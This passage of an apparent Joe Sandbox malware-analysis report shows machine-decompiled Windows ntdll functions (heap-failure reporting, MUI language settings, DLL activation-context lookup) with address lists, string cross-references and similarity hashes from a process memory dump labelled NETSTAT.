				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M02F21E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E02E6B150();
				} else {
					E02E6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E02E6B150("Error code: %d - %s\n",  *0x2f55898);
				_t113 =  *0x2f558a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E02E6B150();
					} else {
						E02E6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E02E6B150("Parameter1: %p\n",  *0x2f558a4);
				}
				_t115 =  *0x2f558a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E02E6B150();
					} else {
						E02E6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E02E6B150("Parameter2: %p\n",  *0x2f558a8);
				}
				_t117 =  *0x2f558ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E02E6B150();
					} else {
						E02E6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E02E6B150("Parameter3: %p\n",  *0x2f558ac);
				}
				_t119 =  *0x2f558b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E02E6B150();
					} else {
						E02E6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x2f558b4);
					E02E6B150("Last known valid blocks: before - %p, after - %p\n",  *0x2f558b0);
				} else {
					_t120 =  *0x2f558b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E02E6B150();
				} else {
					E02E6B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E02E6B150("Stack trace available at %p\n", 0x2f558c0);
			}

0x02f21c10
0x02f21c16
0x02f21c1e
0x02f21c3d
0x02f21c3e
0x02f21c20
0x02f21c35
0x02f21c3a
0x02f21c44
0x02f21c55
0x02f21c5a
0x02f21c65
0x02f21c67
0x00000000
0x02f21c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x02f21c67
0x02f21cdc
0x02f21ce5
0x02f21d04
0x02f21d05
0x02f21ce7
0x02f21cfc
0x02f21d01
0x02f21d0b
0x02f21d17
0x02f21d1f
0x02f21d25
0x02f21d30
0x02f21d4f
0x02f21d50
0x02f21d32
0x02f21d47
0x02f21d4c
0x02f21d61
0x02f21d67
0x02f21d68
0x02f21d6e
0x02f21d79
0x02f21d98
0x02f21d99
0x02f21d7b
0x02f21d90
0x02f21d95
0x02f21daa
0x02f21db0
0x02f21db1
0x02f21db7
0x02f21dc2
0x02f21de1
0x02f21de2
0x02f21dc4
0x02f21dd9
0x02f21dde
0x02f21df3
0x02f21df9
0x02f21dfa
0x02f21e00
0x02f21e0a
0x02f21e13
0x02f21e32
0x02f21e33
0x02f21e15
0x02f21e2a
0x02f21e2f
0x02f21e39
0x02f21e4a
0x02f21e02
0x02f21e02
0x02f21e08
0x00000000
0x00000000
0x02f21e08
0x02f21e5b
0x02f21e7a
0x02f21e7b
0x02f21e5d
0x02f21e72
0x02f21e77
0x02f21e95

Strings

heap_failure_listentry_corruption, xrefs: 02F21CD0
heap_failure_invalid_argument, xrefs: 02F21CAD
heap_failure_generic, xrefs: 02F21C7C
heap_failure_usage_after_free, xrefs: 02F21CBB
Parameter2: %p, xrefs: 02F21DA5
HEAP: , xrefs: 02F21C16, 02F21C3D, 02F21D04, 02F21D4F, 02F21D98, 02F21DE1, 02F21E32, 02F21E7A
heap_failure_internal, xrefs: 02F21C6E
Last known valid blocks: before - %p, after - %p, xrefs: 02F21E45
heap_failure_freelists_corruption, xrefs: 02F21CC9
Parameter1: %p, xrefs: 02F21D5C
heap_failure_virtual_block_corruption, xrefs: 02F21C91
heap_failure_block_not_busy, xrefs: 02F21CA6
heap_failure_entry_corruption, xrefs: 02F21C83
Error code: %d - %s, xrefs: 02F21D12
heap_failure_invalid_allocation_type, xrefs: 02F21CB4
Stack trace available at %p, xrefs: 02F21E86
heap_failure_lfh_bitmap_mismatch, xrefs: 02F21CD7
heap_failure_multiple_entries_corruption, xrefs: 02F21C8A
heap_failure_buffer_underrun, xrefs: 02F21C9F
heap_failure_unknown, xrefs: 02F21C75
Heap error detected at %p (heap handle %p), xrefs: 02F21C50
Parameter3: %p, xrefs: 02F21DEE
HEAP[%wZ]: , xrefs: 02F21C30, 02F21CF7, 02F21D42, 02F21D8B, 02F21DD4, 02F21E25, 02F21E6D
heap_failure_buffer_overrun, xrefs: 02F21C98
heap_failure_cross_heap_operation, xrefs: 02F21CC2

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: 566ca9783af84fea25ffd30c5d577d42e06c90b9602520241a4b4ccb095fb5ad
Instruction ID: 9621bbcc9bb828e5c20b973ee9719120919b714fd98da3c5036110c88e94662d
Opcode Fuzzy Hash: 566ca9783af84fea25ffd30c5d577d42e06c90b9602520241a4b4ccb095fb5ad
Instruction Fuzzy Hash: 0561E437AE1178EFD2119B84D489D3373A5E705AF974DE06AFA0EAB203C6749844CE1D

Uniqueness

Uniqueness Score: -1.00%

Function 02E73D34, Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E02E73D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E02E71B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E02E71B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E02E71B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E02E71B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E02E71B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L02E84620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E02EAF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E02EB1370(_t276, 0x2e44e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E02EABB40(0,  &_v68, _t170);
									if(L02E743C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E02EABB40(_t257,  &_v68, _t243);
								if(L02E743C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E02EB1370(_t278, 0x2e44e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L02E84620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E02EAF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E02EB1370(_v16, 0x2e44e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E02EABB40(_t262,  &_v68, _t244);
								if(L02E743C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E02EB1370(_t282, 0x2e44e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E02EABB40(_t262,  &_v68, _t201);
							if(L02E743C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L02E84620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E02EAF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E02EB1370(_t280, 0x2e44e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E02EABB40(_t267,  &_v68, _t245);
							if(L02E743C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E02EB1370(_t284, 0x2e44e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E02EABB40(_t267,  &_v68, _t224);
						if(L02E743C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x02e73d3c
0x02e73d42
0x02e73d44
0x02e73d46
0x02e73d49
0x02e73d4c
0x02e73d4f
0x02e73d52
0x02e73d55
0x02e73d58
0x02e73d5b
0x02e73d5f
0x02e73d61
0x02e73d66
0x02ec8213
0x02ec8218
0x02e74085
0x02e74088
0x02e7408e
0x02e74094
0x02e7409a
0x02e740a0
0x02e740a6
0x02e740a9
0x02e740af
0x02e740b6
0x02e740bd
0x02e740bd
0x02e73d83
0x02ec821f
0x02ec8229
0x02ec8238
0x02ec8238
0x02ec823d
0x02ec823d
0x02e73da0
0x02e73daf
0x02e73db5
0x02e73dba
0x02e73dba
0x02e73dd4
0x02e73e94
0x02e73eab
0x02e73f6d
0x02e73f84
0x02e7406b
0x02e7406b
0x02e7406e
0x02e7406e
0x02e74070
0x02e74074
0x02ec8351
0x02ec8351
0x02e7407a
0x02e7407f
0x02ec835d
0x02ec8370
0x02ec8377
0x02ec8379
0x02ec837c
0x02ec837c
0x02ec835d
0x00000000
0x02e7407f
0x02e73f8a
0x02e73f8d
0x02e73f90
0x02e73f95
0x02ec830d
0x02ec830f
0x02e73f9b
0x02e73fac
0x02e73fae
0x02e73fb1
0x02e73fb1
0x02e73fb6
0x02ec8317
0x02ec831a
0x00000000
0x02e73fbc
0x02e73fc1
0x02e73fc9
0x02e73fd7
0x02e73fda
0x02e73fdd
0x02e74021
0x02e74021
0x02e74029
0x02e74030
0x02e74044
0x02e74046
0x02e74046
0x02e74044
0x02e74049
0x02ec8327
0x02ec8334
0x02ec8339
0x02ec833c
0x02e7404f
0x02e7404f
0x02e7404f
0x02e74051
0x02e74056
0x02e74063
0x02e74063
0x02e74068
0x00000000
0x02e74068
0x02e73fdf
0x02e73fe2
0x02e73fe4
0x02e73fe7
0x02e73fef
0x02e74003
0x02e74005
0x02e74005
0x02e7400c
0x02e74013
0x02e74016
0x02e74017
0x02e7401b
0x02e7401e
0x00000000
0x02e7401e
0x02e73fb6
0x02e73eb1
0x02e73eb4
0x02e73eb7
0x02e73ebc
0x02ec82a9
0x02ec82ab
0x02e73ec2
0x02e73ed3
0x02e73ed5
0x02e73ed8
0x02e73ed8
0x02e73edd
0x02ec82b3
0x02ec82b6
0x00000000
0x02e73ee3
0x02e73ee8
0x02e73eed
0x02e73ef0
0x02e73ef3
0x02e73f02
0x02e73f05
0x02e73f08
0x02ec82c0
0x02ec82c3
0x02ec82c5
0x02ec82c8
0x02ec82d0
0x02ec82e4
0x02ec82e6
0x02ec82e6
0x02ec82ed
0x02ec82f4
0x02ec82f7
0x02ec82f8
0x02ec82fc
0x02ec82ff
0x02ec82ff
0x02e73f0e
0x02e73f11
0x02e73f16
0x02e73f1d
0x02e73f31
0x02ec8307
0x02ec8307
0x02e73f31
0x02e73f39
0x02e73f48
0x02e73f4d
0x02e73f50
0x02e73f50
0x02e73f53
0x02e73f58
0x02e73f65
0x02e73f65
0x02e73f6a
0x00000000
0x02e73f6a
0x02e73edd
0x02e73dda
0x02e73ddd
0x02e73de0
0x02e73de5
0x02ec8245
0x02e73deb
0x02e73df7
0x02e73dfc
0x02e73dfe
0x02e73e01
0x02e73e01
0x02e73e06
0x02ec824d
0x02ec824f
0x02ec8254
0x00000000
0x02e73e0c
0x02e73e11
0x02e73e16
0x02e73e19
0x02e73e29
0x02e73e2c
0x02e73e2f
0x02ec825c
0x02ec825f
0x02ec8261
0x02ec8264
0x02ec826c
0x02ec8280
0x02ec8282
0x02ec8282
0x02ec8289
0x02ec8290
0x02ec8293
0x02ec8294
0x02ec8298
0x02ec829b
0x02ec829b
0x02e73e35
0x02e73e38
0x02e73e3d
0x02e73e44
0x02e73e58
0x02ec82a3
0x02ec82a3
0x02e73e58
0x02e73e60
0x02e73e6f
0x02e73e74
0x02e73e77
0x02e73e77
0x02e73e7a
0x02e73e7f
0x02e73e8c
0x02e73e8c
0x02e73e91
0x00000000
0x02e73e91

Strings

Kernel-MUI-Language-SKU, xrefs: 02E73F70
WindowsExcludedProcs, xrefs: 02E73D6F
Kernel-MUI-Language-Disallowed, xrefs: 02E73E97
Kernel-MUI-Number-Allowed, xrefs: 02E73D8C
Kernel-MUI-Language-Allowed, xrefs: 02E73DC0

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: a15b3d421c98e608ea3ba0f0015c01442df2b58b2f364680676af4c9f8adbfae
Instruction ID: 930e1c05aa089baac94c74486cf5a8069eed4a93be1d37dc965ed21ffbe9443e
Opcode Fuzzy Hash: a15b3d421c98e608ea3ba0f0015c01442df2b58b2f364680676af4c9f8adbfae
Instruction Fuzzy Hash: CDF14E72D80218EFCB15DF98C940EEEBBB9FF48754F15906AE509AB250E7359E01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02E98E00, Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E02E98E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x2f5d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x2f58464; // 0x74e10110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x2f55780 & 0x00000003) != 0) {
							E02EE5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x2f55780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E02EAB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x2f57984; // 0x3f2ac8
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x2f58464; // 0x74e10110
					 *0x2f5b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E02E99B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x2f55780 & 0x00000005) != 0) {
						_push(_t49);
						E02EE5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x02e98e0f
0x02e98e16
0x02e98e19
0x02e98e1b
0x02e98e21
0x02e98e7f
0x02e98e85
0x02ed9354
0x02ed936c
0x02ed9371
0x02ed937b
0x02ed9381
0x02ed9381
0x02ed937b
0x02e98e9d
0x02e98e9d
0x02e98e29
0x02e98e2c
0x02e98e38
0x02e98e3e
0x02e98e43
0x02e98eb5
0x02e98eb9
0x02ed92aa
0x02ed92af
0x02ed92e8
0x02ed92e8
0x02ed92af
0x02e98eb9
0x02e98e45
0x02e98e53
0x02e98e5b
0x02e98e5f
0x02e98e78
0x02e98e78
0x02e98e7d
0x02e98ec3
0x02e98ecd
0x02e98ed2
0x02e98ed2
0x02e98ec5
0x02e98ec5
0x00000000
0x02e98e7d
0x02e98e67
0x02e98ea4
0x02ed931a
0x00000000
0x00000000
0x02ed9320
0x02e98ea4
0x02e98e70
0x02ed9325
0x02ed9340
0x02ed9345
0x02ed9345
0x02e98e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

LdrpFindDllActivationContext, xrefs: 02ED9331, 02ED935D
minkernel\ntdll\ldrsnap.c, xrefs: 02ED933B, 02ED9367
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 02ED932A
Querying the active activation context failed with status 0x%08lx, xrefs: 02ED9357

Memory Dump Source

Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true

Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp Download File
Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: e76eb8e3ec51f8457548135e6bce4ecf85029a664950a78d73e23b418e6d477c
Instruction ID: d7ecfe5ead5414674cf163325ea44df1c5b9404769c059f38b511f299b967e36
Opcode Fuzzy Hash: e76eb8e3ec51f8457548135e6bce4ecf85029a664950a78d73e23b418e6d477c
Instruction Fuzzy Hash: DA410832AC03199FEF34EA14DC68B75B76DAB0624CF0AF56BE905571B1E7706C80C681

Uniqueness

Uniqueness Score: -1.00%

Function 02E78794, Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E02E78794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E02E7934A() != 0) {
								_t159 = E02EEA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x2f55780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E02EE5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x2f55780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E02E7849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E02E78999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E02E78999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x2f55c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x2f55c60 + _t91 * 8)) == _t129) {
														break;
